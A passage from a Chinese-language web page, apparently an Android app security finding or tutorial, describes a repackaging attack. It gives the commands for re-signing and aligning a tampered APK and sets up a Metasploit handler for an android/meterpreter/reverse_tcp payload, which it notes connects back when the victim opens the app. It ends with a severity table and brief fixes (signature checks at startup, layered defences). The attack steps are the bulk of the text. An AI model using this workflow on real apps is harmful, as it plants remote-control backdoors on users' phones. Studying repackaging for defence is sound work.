<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>你的密码</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> repackaged.apk mykeyaliasname</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>apksigner </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>方式</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>如需要禁用</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> v2</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>签名</strong></span><span> </span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>添加选项</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>--v2-signing-enabled false</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>验证,以下任选其一</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>jarsigner</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>方式</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>jarsigner -verify repackaged.apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>apksigner </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>方式</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>apksigner verify -v --print-certs repackaged.apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>keytool</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>方式</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>keytool -printcert -jarfile repackaged.apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>对齐</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>字节对齐优化</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>zipalign -v 4 repackaged.apk final.apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>检查是否对齐</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>zipalign -c -v 4 final.apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>注:</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>zipalign</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>可以在</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>V1</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>签名后执行,但</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>zipalign</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>不能在</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>V2</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>签名后执行</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>,</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>只能在</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>V2</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>签名之前执行</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>启动</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>Metasploit</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>控制台,配置参数等待上线</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>在终端依次输入如下命令</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>msfconsole</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>use exploit/multi/handler</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>set PAYLOAD android/meterpreter/reverse_tcp</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>set LHOST 192.xxx.xx.xx</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>set LPORT 4444</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>exploit</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>之前我们把入口放在</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> MainActivity </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>的</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> onCreate </strong></span></span></span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>方法中,当启动目标应用进入该界面,就会连接成功,如下图:</strong></span><span> <span lang="EN-US"><span style="line-height:2;font-size:16px;"><strong> </strong></span><img width="554" height="296" src="https://www.2k8.org/content/uploadfile/202206/08/8af6c8d5.png" alt="" style="vertical-align:middle;" /></span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>漏洞危害:中</strong></span></b></span></span><span><span><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b></span></span>
</p>
<div align="center">
<span><span></span></span><span><span></span></span><span><span></span></span><span><span></span></span><span><span></span></span><span><span></span></span><span><span></span></span>
<table border="1" cellpadding="0" cellspacing="0" width="552" style="border:none;border-collapse:collapse;font-family:Calibri,sans-serif;font-size:10.5pt;">
<thead>
<tr>
<td width="104" style="background:#CCCCCC;border:solid windowtext 1.5pt;border-right:solid windowtext 1.0pt;padding:0cm 5.4pt 0cm 5.4pt;width:78.3pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>严重程度</strong></span></span></span><span><span></span></span><span><span><span lang="EN-US"></span></span></span>
</p>
</td>
<td width="79" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:59.3pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span style="color:red;font-family:宋体;line-height:2;font-size:16px;"><strong>高</strong></span></b></span></span><span><span><b><span lang="EN-US" style="color:red;"></span></b></span></span>
</p>
</td>
<td width="72" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:53.8pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span style="color:red;font-family:宋体;line-height:2;font-size:16px;"><strong>■</strong></span></span></span><span><span><b><span lang="EN-US" style="color:red;"></span></b></span></span>
</p>
</td>
<td width="76" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:57.05pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>中</strong></span></span></span><span><span><span lang="EN-US" style="color:black;"></span></span></span>
</p>
</td>
<td width="75" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:56.2pt;">
<span><span></span></span>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="color:#FFC000;line-height:2;font-size:16px;"><strong> </strong></span></span></span>
</p>
</td>
<td width="72" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:53.7pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>低</strong></span></span></span><span><span><span lang="EN-US"></span></span></span>
</p>
</td>
<td width="74" style="border:solid windowtext 1.5pt;border-left:none;padding:0cm 5.4pt 0cm 5.4pt;width:55.65pt;">
<span><span></span></span>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span></span></span>
</p>
</td>
</tr>
</thead>
</table>
</div>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> </strong></span></b></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>修复方法:</strong></span></b></span></span><span><span><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;margin-left:46.65pt;text-align:justify;text-indent:-36.15pt;text-justify:inter-ideograph;">
<span><span><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"><span style="line-height:2;font-size:16px;"><strong> </strong></span><strong><span style="line-height:2;font-size:16px;">1.</span></strong></span></b></span></span><span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>在</strong></span></b></span></span><span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> APP </strong></span></b></span></span><span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>启动时应做签名校验防止二次打包。</strong></span></b></span></span><span><span><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"><br />
<strong><span style="line-height:2;font-size:16px;"> 2.</span></strong></span></b></span></span><span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>建议采用客户端、通信和服务器端联动防御方案进行安全防御。</strong></span></b></span></span><span><span><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></span></span>
</p>
<span></span><span></span>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-size:16px;line-height:2;"><strong> </strong></span>
</p>
<strong><span style="line-height:2;font-size:16px;"></span></strong>
<p>
<br />
</p>
</div>
页:
[1]